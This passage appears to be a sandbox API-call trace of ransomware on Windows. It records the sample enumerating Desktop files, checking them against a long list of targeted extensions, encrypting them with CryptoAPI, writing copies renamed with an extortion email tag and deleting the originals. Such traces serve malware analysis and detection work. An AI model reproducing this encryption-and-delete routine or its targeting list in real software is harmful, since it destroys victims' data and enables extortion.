	[0183.572] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\9lc2m1bibxn3uehcgc.swf")) returned 0
	[0183.573] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeafffd00, ftCreationTime.dwHighDateTime=0x1d973ff, ftLastAccessTime.dwLowDateTime=0x84e423a0, ftLastAccessTime.dwHighDateTime=0x1d97569, ftLastWriteTime.dwLowDateTime=0x84e423a0, ftLastWriteTime.dwHighDateTime=0x1d97569, nFileSizeHigh=0x0, nFileSizeLow=0xc5f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AMgG0waI -5.wav", cAlternateFileName="AMGG0W~1.WAV")) returned 1
	[0183.573] lstrcmpW (lpString1="AMgG0waI -5.wav", lpString2="..") returned 1
	[0183.573] lstrcmpW (lpString1="AMgG0waI -5.wav", lpString2=".") returned 1
	[0183.573] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.573] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="AMgG0waI -5.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\AMgG0waI -5.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\AMgG0waI -5.wav"
	[0183.573] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\AMgG0waI -5.wav") returned 56
	[0183.573] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.573] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\AMgG0waI -5.wav", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav") returned 0x38
	[0183.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.574] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.574] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav"
	[0183.574] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav") returned 56
	[0183.574] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.574] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.574] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0183.575] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.575] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.575] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.575] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.575] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.580] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xc5f2, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xc5f2, lpOverlapped=0x0) returned 1
	[0183.583] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.584] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb088) returned 1
	[0183.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.586] CryptCreateHash (in: hProv=0xfcb088, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.586] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.586] CryptDeriveKey (in: hProv=0xfcb088, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb92f0) returned 1
	[0183.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.587] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xc5f2, dwBufLen=0xc5f2 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xc600) returned 1
	[0183.588] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.588] RtlMoveMemory (in: Destination=0xfe9780, Source=0xfdd180, Length=0xc5f2 | out: Destination=0xfe9780) 
	[0183.588] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.588] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9780*, pdwDataLen=0x18aefc*=0xc5f2, dwBufLen=0xc600 | out: pbData=0xfe9780*, pdwDataLen=0x18aefc*=0xc600) returned 1
	[0183.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.589] CryptDestroyKey (hKey=0xfb92f0) returned 1
	[0183.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.590] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0183.590] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.590] CryptReleaseContext (hProv=0xfcb088, dwFlags=0x0) returned 1
	[0183.590] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.590] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.591] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.591] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.593] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 98
	[0183.593] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.594] WriteFile (in: hFile=0x390, lpBuffer=0xfe9780*, nNumberOfBytesToWrite=0xc600, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe9780*, lpNumberOfBytesWritten=0x18b358*=0xc600, lpOverlapped=0x0) returned 1
	[0183.598] CloseHandle (hObject=0x390) returned 1
	[0183.598] CloseHandle (hObject=0x388) returned 1
	[0183.599] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav")) returned 1
	[0183.605] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\amgg0wai -5.wav")) returned 0
	[0183.605] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50819b60, ftCreationTime.dwHighDateTime=0x1d974c9, ftLastAccessTime.dwLowDateTime=0x3230ace0, ftLastAccessTime.dwHighDateTime=0x1d97529, ftLastWriteTime.dwLowDateTime=0x3230ace0, ftLastWriteTime.dwHighDateTime=0x1d97529, nFileSizeHigh=0x0, nFileSizeLow=0xd7c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kT2GrVXJb8KnckN865l.mkv", cAlternateFileName="KT2GRV~1.MKV")) returned 1
	[0183.605] lstrcmpW (lpString1="kT2GrVXJb8KnckN865l.mkv", lpString2="..") returned 1
	[0183.606] lstrcmpW (lpString1="kT2GrVXJb8KnckN865l.mkv", lpString2=".") returned 1
	[0183.606] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\"
	[0183.606] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\", lpString2="kT2GrVXJb8KnckN865l.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\kT2GrVXJb8KnckN865l.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\kT2GrVXJb8KnckN865l.mkv"
	[0183.606] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\kT2GrVXJb8KnckN865l.mkv") returned 64
	[0183.606] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.606] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\kT2GrVXJb8KnckN865l.mkv", cchLength=0x40 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv") returned 0x40
	[0183.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.606] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.606] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv"
	[0183.607] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\kt2grvxjb8knckn865l.mkv") returned 64
	[0183.607] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.608] StrStrW (lpFirst=".mkv", lpSrch=".") returned=".mkv"
	[0183.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
